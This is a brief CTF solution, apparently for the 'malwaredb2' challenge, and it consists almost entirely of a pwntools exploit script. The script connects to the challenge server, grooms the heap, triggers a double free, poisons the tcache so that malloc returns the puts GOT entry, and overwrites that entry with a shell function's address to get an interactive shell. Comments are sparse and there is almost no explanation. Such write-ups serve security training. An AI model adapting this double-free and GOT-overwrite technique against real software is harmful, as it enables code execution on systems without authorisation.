malwaredb2 epxloit

exploit.py

from pwn import *

#r = remote("localhost", 1337) 
r = remote("malwaredb2.zajebistyc.tf", 30103) 

print r.recvuntil("5. Exit\n\n---------------------------------------")


def new(name, description="", sha="", ransom=""):
	r.send("1\n")
	print r.recvuntil("[*] Provide malware name: (Max. 16 chars)")
	r.sendline(name)
	print r.recvuntil("[*] Provide short description of sample: (Max. 180 chars)")
	r.sendline(description)
	print r.recvuntil("[*] Provide sample SHA1: (Max. 46 chars)")
	r.sendline(sha)
	print r.recvuntil("[*] Would you like to add ransom note content? [Y/N]")
	if (ransom):
		r.sendline("Y")
		print r.recvuntil("[*] Go ahead - provide not below..(Max. 318 chars)")
		r.sendline(ransom)
	else:
		r.sendline("N")
	print r.recvuntil("5. Exit\n\n---------------------------------------")
	
def new_(name, description="", sha="", ransom=""):
	r.send("1\n")
	print r.recvuntil("[*] Provide malware name: (Max. 16 chars)")
	r.sendline(name)
		
		
def delete(idx):
	r.send("3\n")
	print r.recvuntil("[*] Provide record number to delete:")
	r.sendline(str(idx))
	print r.recvuntil("5. Exit\n\n---------------------------------------")

for i in range(7):
	new("iiii")
# id: 0-6

new("prevprev") #id: 7
new("aaaaaaa")  #id: 8
new("padding")  #id: 9

for i in range(7):
	delete(i)
#allocated chunks id: 7,8,9

delete(8) #free aaaaa
delete(7) #free prevprev
#allocated chunks id: 9

new("ddddd") #id: 0
new("dddd2") #id: 1
#allocated chunks id: 0,1,9

delete(8) #free aaaaaa - double free
delete(1) 
#allocated chunks id: 0,9


new("attack", ransom="Z"*0x100+p64(0x0)+p64(0x101)+p64(0x404020)) # 0x404020 - puts in GOT, malloc will return a pointer to this area

new("???") #get one chunk from tcache bin

new_(p64(0x4011B2)) #overwrite puts in GOT to db_shell function
r.interactive()